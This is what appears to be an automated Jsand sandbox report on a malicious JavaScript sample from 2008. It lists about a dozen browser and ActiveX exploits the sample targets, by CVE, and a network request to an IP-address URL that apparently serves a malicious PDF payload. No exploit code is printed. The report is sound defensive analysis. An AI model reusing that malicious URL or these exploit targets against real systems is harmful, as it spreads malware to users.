Analysis report for 2e678cb760caed3be7bf34f3b2f00058.js

Sample Overview

File: 2e678cb760caed3be7bf34f3b2f00058.js
MD5: 2e678cb760caed3be7bf34f3b2f00058
Analysis Started: 2008-11-20 15:37:40
Report Generated: 2009-01-05 13:16:18
Jsand version: 1.03.02

Detection results

Detector: Jsand 1.03.02
Result: malicious

Exploits

Name (Reference): Description

SuperBuddy LinkSBIcons (CVE-2006-5820): The LinkSBIcons method in AOL's SuperBuddy ActiveX control (Sb.SuperBuddy.1) dereferences an arbitrary function pointer.
DirectAnimation PathControl (CVE-2006-4777): Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1 via unknown manipulations in arguments to the KeyFrame method.
Office Snapshot Viewer (CVE-2008-2463): The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine.
WksPictureInterface (CVE-2008-1898): An ActiveX control in WkImgSrv.dll allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value.
OurGame various errors (SA30469): Errors in the GLIEDown2.dll ActiveX control via the methods and properties IEStart, IEStartNative, ServerList, GameInfo and GroupName.
GomPlayer OpenURL (CVE-2007-5779): Buffer overflow in the GomManager via a long argument to the OpenUrl method.
QuickTime RTSP (CVE-2007-0015): Stack-based buffer overflow in Apple QuickTime via an RTSP response with a long Content-Type header.
NCTAudioFile2 SetFormatLikeSample (CVE-2007-0018): Stack-based buffer overflow in the NCTAudioFile2.AudioFile ActiveX control via a long argument to the SetFormatLikeSample function.
Creative CacheFolder (CVE-2008-0955): Stack-based buffer overflow in the Creative Software AutoUpdate Engine ActiveX control via a long CacheFolder property value.
MDAC (CVE-2006-0003): Arbitrary file download via the Microsoft Data Access Components (MDAC).
WebViewFolder (CVE-2006-3730): WebViewFolder integer overflow via the setSlice method.

Deobfuscation results

Evals

Writes

No writes.

Network

Requests

URL (Status)

http://www.cs.ucsb.edu/~marco/jsan/unknown (200)
http://59.125.229.71/ex/7/pdf.php?id=106 (500)

Redirects

No redirects.

ActiveX controls

Shellcode and Malware


No additional malware was retrieved.